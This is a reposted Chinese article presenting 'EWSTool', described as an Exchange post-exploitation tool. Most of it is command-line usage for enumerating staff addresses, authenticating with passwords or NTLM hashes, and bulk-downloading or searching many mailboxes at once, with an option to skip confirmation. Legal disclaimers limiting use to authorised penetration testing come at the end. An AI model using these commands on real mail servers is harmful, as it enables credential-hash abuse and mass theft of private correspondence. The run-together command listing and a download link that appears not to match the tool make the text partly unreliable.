功能
- 获取人员信息
获取所有人员信息及邮箱地址。 - 获取文件夹列表
获取邮箱中的所有文件夹列表。 - 下载邮件
下载指定邮箱文件夹的邮件。 - 搜索邮件
按关键字或日期范围搜索邮件。 - 批量下载邮件
下载指定一批邮箱的邮件。 - 批量搜索邮件
按关键字或日期范围搜索指定一批邮箱的邮件。 - 代理支持
支持HTTP代理。
获取所有人员信息:
python ewstools.py --host <host> --username <username> --password <password> peoplepython ewstools.py --host <host> --username <username> --hash <hash> people
# 指定用户名和密码python ewstools.py --host <host> --username <username> --password <password> folders# 指定用户名和哈希python ewstools.py --host <host> --username <username> --hash <hash> folders# 批量获取文件夹列表python ewstools.py --host <host> --users <users_file> folders
# 下载所有文件夹中的邮件python ewstools.py --host <host> --username <username> --password <password> download --folder all# 下载指定文件夹中的邮件python ewstools.py --host <host> --username <username> --password <password> folderspython ewstools.py --host <host> --username <username> --password <password> download --folder <folder_name># 跳过确认python ewstools.py --host <host> --username <username> --password <password> download --folder all -y# 批量下载邮件python ewstools.py --host <host> --users <users_file> download --folder all# 跳过确认python ewstools.py --host <host> --users <users_file> download --folder all -y
python ewstools.py --host <host> --username <username> --password <password> download --id <id> --key <key># 在所有文件夹中搜索关键字python ewstools.py --host <host> --username <username> --password <password> search --type keyword --keyword <keyword> --folder all# 在指定文件夹中搜索关键字python ewstools.py --host <host> --username <username> --password <password> folderspython ewstools.py --host <host> --username <username> --password <password> search --type keyword --keyword <keyword> --folder <folder_name># 跳过确认python ewstools.py --host <host> --username <username> --password <password> search --type keyword --keyword <keyword> --folder all -y# 批量搜索邮件python ewstools.py --host <host> --users <users_file> search --type keyword --keyword <keyword> --folder all -y
# 在所有文件夹中搜索日期范围python ewstools.py --host <host> --username <username> --password <password> search --type DateTimeReceived --start <start_date> --end <end_date> --folder all# 在指定文件夹中搜索日期范围python ewstools.py --host <host> --username <username> --password <password> folderspython ewstools.py --host <host> --username <username> --password <password> search --type DateTimeReceived --start <start_date> --end <end_date> --folder <folder_name># 跳过确认python ewstools.py --host <host> --username <username> --password <password> search --type DateTimeReceived --start <start_date> --end <end_date> --folder all -y# 批量搜索邮件python ewstools.py --host <host> --users <users_file> search --type DateTimeReceived --start <start_date> --end <end_date> --folder all -y
ewstools.py文件中,可以配置以下参数:TEMPLATES_FOLDER
模板文件夹路径。 HTTP_PROTO
HTTP协议(默认 https)。EXCHANGE_NAMESPACE
Exchange命名空间。 HEADERS
HTTP请求头。 下载
- https://github.com/ThomasMBury/ewstools
法律声明
-
本工具仅限授权测试使用,禁止用于非法用途 -
使用前需获得目标系统的书面渗透测试授权 -
操作敏感数据时请遵守当地数据隐私法规
原文始发于微信公众号(Khan安全团队):EWSTool - Exchange后渗透工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论